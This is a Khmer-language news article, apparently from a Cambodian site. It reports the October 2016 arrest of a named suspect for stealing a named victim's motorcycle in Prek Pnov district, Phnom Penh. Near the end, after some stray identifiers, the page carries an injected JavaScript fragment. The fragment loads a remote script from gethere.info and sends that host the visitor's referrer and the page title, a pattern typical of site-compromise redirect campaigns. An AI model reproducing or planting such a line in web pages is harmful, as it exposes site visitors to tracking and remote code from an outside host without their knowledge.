នគរបាលខណ្ឌព្រែកព្នៅតាមប្រមាញ់បានជនសង្ស័យម្នាក់ ក្រោយធ្វើសកម្មភាពលួចម៉ូតូបាន៧ថ្ងៃ

ភ្នំពេញ៖ ជនសង្ស័យម្នាក់ ត្រូវកម្លាំងសមត្ថកិច្ចខណ្ឌព្រែកព្នៅ សហការជាមួយកម្លាំងសមត្ថកិច្ចប៉ុស្តិ៍ បានធ្វើការឃាត់ខ្លួនជនសង្ស័យខាងលើ ក្រោយពីបានទទួលពាក្យបណ្តឹងពីជនរងគ្រោះ ហើយសមត្ថកិច្ចយើងបានធ្វើការស្រាវជ្រាវរហូតឈានដល់ការឃាត់ខ្លួនបានកាលពីវេលាម៉ោង ១២និង០០នាទី ថ្ងៃទី១០ ខែតុលា ឆ្នាំ២០១៦ ដែលស្ថិតនៅតាមបណ្តោយផ្លូវជាតិលេខ៥ ក្នុងភូមិពោធិមង្គល សង្កាត់ព្រែកព្នៅ ខណ្ឌព្រែកព្នៅ រាជធានីភ្នំពេញ។

លោក ឈិន គឹមធុយ អធិការនគរបាលខណ្ឌព្រែកព្នៅ បានអោយដឹងថាជនសង្ស័យដែលឃាត់ខ្លួននោះមានឈ្មោះ ចាន់ ផល្លា ភេទប្រុស អាយុ ២៩ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ កម្មករសែងត្រី ស្នាក់នៅភូមិឡកំបោ សង្កាត់ស្វាយប៉ាក ខណ្ឌឬស្សីកែវ។ ចំណែក ជនរងគ្រោះឈ្មោះ សំ ថាញ់ ភេទប្រុស អាយុ ៣៦ឆ្នាំ ជនជាតិវៀតណាម មុខរបរ ជាងសំណង់ ស្នាក់នៅភូមិពោធិមង្គល សង្កាត់ព្រែកព្នៅ ខណ្ឌព្រែកព្នៅ ជាម្ចាស់ម៉ូតូ សីុរូស ពណ៌ខ្មៅ សេ៊រី២០០៨ ពាក់ស្លាកលេខ សៀមរាប 1A-0485។

 

អធិការនគរបាលខណ្ឌព្រែកព្នៅបានអោយដឹងទៀតថា នៅមុនពេលកើតហេតុ យប់ថ្ងៃទី០៤ ខែតុលា ឆ្នាំ២០១៦ នៅវេលាម៉ោងប្រហែល ៧និង៣០នាទីយប់ ជនរងគ្រោះបានទុក្ខម៉ូតូនៅចិញ្ចើមផ្លូវលំ ដែលស្ថិតនៅក្នុងភូមិពោធិមង្គល សង្កាត់ព្រែកព្នៅ បន្ទាប់មក ជនរងគ្រោះក៏បានដើរចូលទៅបែរចិញ្ចឹមត្រីនៅមាត់ទន្លេសាបចំងាយប្រហែលជា ១៥០ម៉ែត្រពីម៉ូតូរបស់ខ្លួន។ មួយស្ទុះក្រោយមក ខ្លួនក៏បានដើរត្រឡប់មកវិញ ស្រាប់តែមិនបានឃើញម៉ូតូរបស់ខ្លួន។ ភ្លាមៗនោះ មានឈ្មោះ ឡេ យំុាងយូ ភេទប្រុស ដែលជាអ្នកស្គាល់គ្នាបានប្រាប់ថា ម៉ូតូរបស់ខ្លួនត្រូវឈ្មោះ ចាន់ ផល្លា បានលួចយកម៉ូតូទៅបាត់ហើយ។ ក្រោយពីកើតហេតុ ជនរងគ្រោះបានទៅដាក់ពាក្យបណ្តឹងនៅប៉ុស្តិ៍នគរបាលរដ្ឋបាលព្រែកព្នៅ ដើម្បីអោយសមត្ថកិច្ចជួយអន្តរាគមន៍ និងស្វែងរកជនសង្ស័យខាងលើយកមកអនុវត្តច្បាប់។

 

ក្រោយពីសមត្ថកិច្ចបានទទួលពាក្យបណ្តឹងពីជនរងគ្រោះរួចមក កម្លាំងសមត្ថកិច្ចខណ្ឌ និងប៉ុស្តិ៍បានធ្វើការស្រាវជ្រាវកំណត់មុខសញ្ញារហូតដល់ថ្ងៃទី១០ ខែតុលា ឆ្នាំ២០១៦ វេលាម៉ោង ១២និង០០នាទី ទើបកម្លាំងសមត្ថកិច្ចយើងឃាត់បានជនសង្ស័យខាងលើ ហើយនាំយកមកសាកសួរប៉ុស្តិ៍។

 

ក្រោយពីធ្វើការសាកសួររួចមក ជនសង្ស័យខាងលើ បានឆ្លើយសារភាពថា ខ្លួនពិតជាបានធ្វើសកម្មភាពលួចយកម៉ូតូរបស់ជនរងគ្រោះពិតប្រាកដមែន ដោយបានយកទៅបញ្ជាំនៅម្តំុឃ្លាំងរំសេវ ដែលស្ថិតនៅក្នុងសង្កាត់ទឹកល្អក់៣ ខណ្ឌទួលគោក ហើយសមត្ថកិច្ចយើងបានធ្វើដកហូតម៉ូតូខាងលើ យកមកប្រគល់អោយជនរងគ្រោះវិញ។

 

បច្ចុប្បន្នជនសង្ស័យខាងលើ ត្រូវបានសមត្ថកិច្ចឃំុនខ្លួនជាបណ្តោះអាសន្ននៅអធិការដ្ឋាននគរបាលខណ្ឌព្រែព្នៅ ដើម្បីកសាងសំណំុរឿង បញ្ជូនទៅកាន់តុលាការ ចាត់ការបន្តតាមនីតិវិធីច្បាប់៕ដោយ៖ ស៊ុនតិច

d059cb60-20b0-4d6f-a1c7-c23d7ae072e1 688266c7-5c1f-46ed-b632-952702233382 1f9d42fa-45dc-45d0-bcc1-9db37887b149s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More